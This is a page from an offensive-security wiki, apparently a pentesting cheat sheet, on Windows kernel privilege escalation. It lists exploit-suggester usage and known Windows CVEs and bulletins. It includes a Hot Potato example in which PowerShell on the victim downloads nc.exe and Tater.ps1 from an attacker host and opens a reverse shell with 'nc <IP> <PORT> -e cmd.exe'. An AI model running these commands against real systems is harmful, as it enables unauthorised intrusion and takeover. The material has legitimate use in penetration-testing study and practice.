🔴
Hacking
  • 1. Hacking Infrastructure
    • Infra Planification
      • Infrastructure Diagram & Requirements
    • Infra Configuration
      • Attack Server
      • C2 Server
      • Redirector
      • Payload Server
      • Phishing Server
  • 2. Reconnaissance and Information Gathering
    • OSINT (Open-Source Intelligence)
      • Enviroment
      • Android Virtualization
      • Web Browsers
      • Sock Puppets (Covert Accounts)
      • All-purpose Advanced Tools
      • Search Engines
      • People Search Engines
      • Websites & Domains
      • IP Addresses
      • Users & Emails
      • Social Media
      • Documents
      • Images
      • Videos & Lives
      • Metadata
      • Telephone Numbers
      • Online Maps
      • Virtual Currencies
      • Leaks, Breaches, Logs and Ransomware
      • Government & Business Records
    • Port, Version, Vuln Scanning
      • Nmap
      • Shodan
      • Network Mapping
      • Researching Potential Vulnerabilities
      • Dark Web Scanning
  • 3. Social Engeniering
    • Phising
      • Recycling Domains
      • Header Manipulation
      • Email Creation and Delivery
      • Email Spoofing & Warning Disabling
      • Site Building
      • Evilginx
      • Payload Hosting Obfuscation
      • Diverting the Analysts
      • VBA Macros & RTI
      • HTML Smuggling & HTA Files
      • JS Files
      • Other File Types
    • SMS Spoofing
      • SMSpubli
    • Social Engineering Toolkit (SET)
      • SET Installation
  • 4. Exploitation
    • Password Cracking
      • SetUp
      • Wordlist Building
      • Tools
    • Payloads - File Transfer - Coding - MalDev - ExploitDev
      • Payload Triggering
        • Shell File Transfer
        • PS Execution - Donwload Craddles
      • Normal Shells
        • Reverse Shells vs Bind Shells
        • Direct Reverse Shell Commands
        • Interactive Shell
        • Normal Reverse Shell Tools
        • PHP Webshells
        • ASPX Webshells
        • Kraken Webshell
        • Python Webshells
      • Coding Basics
        • Bash
        • Python
        • C
        • C++
        • C#
        • x86-64 (Intel) Assembly - NASM & MASM
      • Windows MalDev
        • MDLC & Tools
        • Architecture, Memory Management, APIs & Processes
        • PEs & DLLs
        • Malware Binary Signing & Metadata Modification
        • Payload Placement
        • Payload Execution Control
        • Payload Encryption & Obfuscation
        • Malware Optimization: Entropy Reduction & Compile Settings
        • Local Payload Execution
        • Process Enum, Injection & Hollowing
        • Payload Staging
        • Thread Hijacking
        • APC Injection
        • Callback Code Execution
        • Mapping Injection
        • Function Stomping Injection
        • PPID Spoofing
        • Process Argument Spoofing
        • API Hooking
        • String Hashing
        • IAT Hiding, Obfuscation & Camouflage
        • Anti-Debugging
        • Anti-Virtualization
        • Syscalls
        • NTDLL Refreshing
      • Windows ExploitDev
        • Tools
        • x86 Vanilla Stack BOF
      • Linux ExploitDev
        • BOF GNU/Linux 32-bit
    • Active Directory
      • Host and Domain Recon
        • SMB (139,445) Enum
        • RPC (135, 1024-5000) Enum
        • LDAP (389,636,3268,3269) Enum
        • PowerView
        • Other tools / Commands
        • BloodHound
      • Attacks and procedures
        • Password Spraying
        • User Impersonation
        • Lateral Movement
        • Kerberos (88)
        • Certificate Services (AD CS)
        • ACLs/ACEs
        • Group Policy
        • MS SQL Servers
        • LAPS (Local Administrator Password Solution)
        • Microsoft Configuration Manager
        • Domain Dominance
        • Forest & Domain Trusts
        • MiTM & Relaying Attack
    • Cloud
      • Azure
        • Basic Info
        • Initial Access
        • Enumeration
        • Privilege Escalation
        • Lateral Movement
        • Persistence
        • Data Exfiltration
      • AWS
        • Basic Info
        • Initial Access
        • Enumeration
        • Privilege Escalation
        • Lateral Movement
        • Post-Exp & Persistence
        • Data Exfiltration
      • Google Cloud
        • Basic Info
        • Initial Access
        • Enumeration
        • Privilege Escalation & Lateral Movement
        • Credential Access
        • Data Exfiltration
    • Web
      • Fingerprinting
      • Automated Scanners
      • Proxies
        • WAFs & Attack Obfuscation
        • HTTP Request Smuggling
      • CMS's: Content Management Systems
      • Authentication
        • Authentication vulnerabilities
        • OAuth 2.0 Authentication Vulnerabilities
        • Access Control
      • Files
        • File Upload
      • Reflected Values
        • Command Injection
        • HTML & XSS Injection
        • SSRF: Server-Side Request Forgery
        • SSTI: Server-Side Template Injection
        • CRLF Injection
        • CSV Injection
        • Openredirect
        • Prototype Pollution
        • ShellShock Attack
      • Search functionalities
        • LFI - RFI - Path traversal
        • SQL Injection
        • NoSQL injection
        • LDAP Injection
        • XPath Injection
      • Forms, WebSockets and PostMsgs
        • CSRF: Croos-Site Request Forgery
        • WebSocket Attacks
      • HTTP Headers
        • Clickjacking
        • CORS
        • Host Header Injection
      • Structured objects - Specific functionalities
        • XML External Entity (XXE) Injection
        • Deserialization Attacks
        • Padding Oracle Attack
      • Whitebox
        • Source Code Recovery, Analysis & Debugging
        • Python PoC Building
        • File Upload
        • SQL Injection
        • JavaScript Injection
        • SSTI (Server-Side Template Injection)
        • PHP Type Juggling
        • Prototype Pollution
        • Password Reset Attacks
    • Network Services
      • FTP 21
      • SSH 22
      • DNS 53,5353
      • FINGER 79
      • POP3 110,995
      • SNMP 161,162,10161,10162
      • MYSQL 3306
      • VNC 5800,5801,5900,5901
      • Ansible
      • Artifactory (8081)
      • Citrix
    • Wireless Pentesting
      • Wireless Reconnaissance
      • Wifite
      • RogueAP
      • WiFi Pineapple Mark VII
    • Camera Pentesting
      • Identifying Unsecured Web Cams
      • Default Passwords
      • Cameraradar
    • SCADA/ICS
      • Reconnaissance
      • Metasploit Modbus
      • modbus-cli
    • Mobile Pentesting
      • Enviroment SetUp
      • Android Pentest
      • iOS Pentest
  • 5. Privesc and Post-explotation
    • Linux Privilege Escalation
      • Manual Testing Elevation of privileges
      • Enumeration Commands
      • Enumeration Scripts
      • Looting for passwords & Interesting Information
      • Writable Files
      • SUDO
      • SSH Key
      • Scheduled tasks
      • SUID
      • Capbilities
      • NFS Root Squashing (Network File Sharing)
      • Shared Library
      • Docker Breakeout
      • Hijack TMUX session
      • Wildcard
      • Kernel Exploits
    • Linux Post-Explotation
      • SSH Backdoor
      • Manual Backdoors
      • Pillaging/Data Harvesting
    • Windows Privilege Escalation
      • Enumeration Scripts
      • Manual Enumeration
      • Metasploit tools
      • Processes Enumeration and Tasks
      • Incorrect permissions in services
      • Unquoted Service Paths
      • Insecure GUI Apps
      • Autorun
      • AlwaysInstallElevated
      • $PATH Interception
      • Looting for passwords
      • Runas
      • Impersonation Privileges
      • From local administrator to NT SYSTEM
      • Common Vulnerabilities and Exposure (CVE)
      • Kernel Exploitation
      • Named Pipes
      • Vulnerable Drivers
      • Abusing Shadow Copies
    • Windows Post-Explotation
      • Credential Theft
      • RDP Hijacking
      • Session Spying
      • WDigest
      • User backdoor
      • Manual Backdoors
      • SharPersist
      • WMI Event Subscriptions Persistance
      • Hunting for COM Hijacks
      • Mail Harvesting
    • Data Exfiltration
  • 6. Evasion Techniques
    • Linux - Evasion Techniques
    • Windows - Evasion Techniques
      • Detection Mechanisms & Evasion Techniques
      • Microsoft Defender Antivirus
      • AMSI & UAC Bypasses
      • AppLocker and Powershell CLM
      • PowerShell Script Block Logging
      • MDE (Microsoft Defender for Endpoint)
      • Altered scripts & Automations
      • Command Reimplementation C#/C
      • EDR Killing
  • 7. Tunneling
    • Port Forwarding
      • SSH Port Forwarding
      • Chisel Port Forwarding
      • Metasploit SSH Port Forwarding
    • Pivoting
      • Linux Tools & Methedology
      • Windows Tools
      • SSH Pivoting
    • C2 (Command and Control)
      • Cobalt Strike
        • Set Up and Team Server
        • Listeners
        • Payloads
        • Attacks
        • Beacon Commands
        • Session Passing
        • Maleable Profiles
        • Artifact Kit
        • Resource Kit
        • Behavioural Detections
        • Aggressor Scripts
        • Beacon Object Files (BOFs)
        • NTLM Relaying Methodology w/ Cobalt
      • Metasploit
        • Schema Cheat Sheet
        • Staged vs Non-Staged Payloads
        • Metasploit Options
        • Start MSF DB (Kali)
        • Listeners
        • Meterpreter Commands
        • Pivoting
        • Meterpreter Pass a Shell
        • Msfvenom Payloads
        • Meterpreter Pillaging/Data Harvesting
      • Havoc
        • Set Up and Team Server
        • Listeners
        • Payloads
        • Deamon Commands
      • Empire
      • Custom C2s
        • HTTP mini C2
  • 8. Profesional Reports
    • LaTeX
      • Tools
      • Variable Config
      • Template definition & PDF Preview
      • Commands
      • Pentest Report Template
    • Documentation Tools
      • Note-Taking
      • Advanced Text Editors
      • Appendix
      • Quality and Diversity of Sources
      • Document Sanitization
    • Report Anatomy
      • OSINT Report Anatomy
Powered by GitBook
On this page
  1. 5. Privesc and Post-explotation
  2. Windows Privilege Escalation

Kernel Exploitation

Run exploit suggester against systeminfo:

https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py

$ python windows-exploit-suggester.py -d 2017-05-27-mssb.xls -i systeminfo.txt

Find installed paths:

$ wmic qfe get Caption,Description,HotFixID,InstalledOn

List of exploits kernel : https://github.com/SecWiki/windows-kernel-exploits

#Security Bulletin #KB #Description #Operating System

  • MS17-017 [KB4013081]  [GDI Palette Objects Local Privilege Escalation]  (windows 7/8)

  • CVE-2017-8464 [LNK Remote Code Execution Vulnerability]  (windows 10/8.1/7/2016/2010/2008)

  • CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability]  (windows 10/8.1/7/2016/2010/2008)

  • CVE-2018-0833 [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2)

  • CVE-2018-8120 [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1)

  • MS17-010 [KB4013389]  [Windows Kernel Mode Drivers]  (windows 7/2008/2003/XP)

  • MS16-135 [KB3199135]  [Windows Kernel Mode Drivers]  (2016)

  • MS16-111 [KB3186973]  [kernel api]  (Windows 10 10586 (32/64)/8.1)

  • MS16-098 [KB3178466]  [Kernel Driver]  (Win 8.1)

  • MS16-075 [KB3164038]  [Hot Potato]  (2003/2008/7/8/2012)

  • Example of Hot Potato explotation

Attacker: sudo python -m SimpleHTTPServer 80 sudo nc -lvp <PORT>

Victim: powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/nc.exe', '.\nc.exe') powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/Tater.ps1.exe', '.\Tater.ps1.exe') powershell -exec bypass -command "& { Import-Module .\Tater.ps1; Invoke-Tater -Trigger 1 -Command '.\nc.exe <IP> <PORT> -e cmd.exe' }"

  • MS16-034 [KB3143145]  [Kernel Driver]  (2008/7/8/10/2012)

  • MS16-032 [KB3143141]  [Secondary Logon Handle]  (2008/7/8/10/2012)

  • MS16-016 [KB3136041]  [WebDAV]  (2008/Vista/7)

  • MS16-014 [K3134228]  [remote code execution]  (2008/Vista/7) ...

  • MS03-026 [KB823980]   [Buffer Overrun In RPC Interface]  (/NT/2000/XP/2003)

To cross compile a program from Kali, use the following command.

Kali>i586-mingw32msvc-gcc -o adduser.exeuseradd.c

PreviousCommon Vulnerabilities and Exposure (CVE)NextNamed Pipes

Last updated 2 years ago